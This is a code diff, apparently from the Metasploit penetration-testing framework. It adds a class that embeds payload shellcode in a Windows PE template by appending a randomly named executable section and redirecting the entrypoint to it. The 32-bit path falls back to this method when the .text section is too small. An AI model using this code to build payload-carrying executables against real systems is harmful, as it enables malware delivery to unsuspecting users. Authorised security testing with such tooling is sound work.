Support templates with small text sections (win32)

Author: HD Moore

lib/msf/core/exe/segment_appender.rb

@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+module Msf
+module Exe
+
+  require 'metasm'
+  require 'msf/core/exe/segment_injector'
+
+  class SegmentAppender < SegmentInjector
+
+    def payload_stub(prefix)
+      # TODO: Implement possibly helpful payload obfuscation
+      asm = "new_entrypoint:\n#{prefix}\n"
+      shellcode = Metasm::Shellcode.assemble(processor, asm)
+      shellcode.encoded + @payload
+    end
+
+    def generate_pe
+      # Copy our Template into a new PE
+      pe_orig = Metasm::PE.decode_file(template)
+      pe = pe_orig.mini_copy
+
+      # Copy the headers and exports
+      pe.mz.encoded = pe_orig.encoded[0, pe_orig.coff_offset-4]
+      pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
+      pe.header.time = pe_orig.header.time
+
+      # Don't rebase if we can help it since Metasm doesn't do relocations well
+      pe.optheader.dll_characts.delete("DYNAMIC_BASE")
+
+      # TODO: Look at supporting DLLs in the future
+      prefix = ''
+
+      # Create a new section
+      s = Metasm::PE::Section.new
+      s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
+      s.encoded = payload_stub prefix
+      s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
+
+      pe.sections << s
+      pe.invalidate_header
+
+      # Change the entrypoint to our new section
+      pe.optheader.entrypoint = 'new_entrypoint'
+      pe.cpu = pe_orig.cpu
+
+      pe.encode_string
+    end
+
+  end
+end
+end

lib/msf/util/exe.rb

@@ -18,6 +18,7 @@ class EXE
 require 'metasm'
 require 'digest/sha1'
 require 'msf/core/exe/segment_injector'
+require 'msf/core/exe/segment_appender'
 
   ##
   #
@@ -198,19 +199,25 @@ def self.to_win32pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
+
+    # dead, dead code.
+
     raise RuntimeError, "No .text section found in the template" unless text
 
     unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
       raise RuntimeError, "The .text section does not contain an entry point"
     end
 
     p_length = payload.length + 256
+
+    # If the .text section is too small, append a new section instead
     if text.size < p_length
-      fname = ::File.basename(opts[:template])
-      msg  = "The .text section for '#{fname}' is too small. "
-      msg << "Minimum is #{p_length.to_s} bytes, your .text section is " +
-             "#{text.size.to_s} bytes"
-      raise RuntimeError, msg
+      appender = Msf::Exe::SegmentAppender.new({
+          :payload  => code,
+          :template => opts[:template],
+          :arch     => :x86
+      })
+      return appender.generate_pe
     end
 
     # Store some useful offsets
@@ -506,7 +513,8 @@ def self.to_win32pe_exe_sub(framework, code, opts = {})
   def self.to_win64pe(framework, code, opts = {})
     # Allow the user to specify their own EXE template
     set_template_default(opts, "template_x64_windows.exe")
-    #try to inject code into executable by adding a section without affecting executable behavior
+
+    # Try to inject code into executable by adding a section without affecting executable behavior
     if opts[:inject]
       injector = Msf::Exe::SegmentInjector.new({
          :payload  => code,
@@ -515,8 +523,20 @@ def self.to_win64pe(framework, code, opts = {})
       })
       return injector.generate_pe
     end
+
     opts[:exe_type] = :exe_sub
-    exe_sub_method(code,opts)
+    return exe_sub_method(code,opts)
+
+    #
+    # TODO: 64-bit support is currently failing to stage
+    #
+    # Append a new section instead
+    # appender = Msf::Exe::SegmentAppender.new({
+    #   :payload  => code,
+    #   :template => opts[:template],
+    #   :arch     => :x64
+    # })
+    # return appender.generate_pe
   end
 
   # Embeds shellcode within a Windows PE file implementing the Windows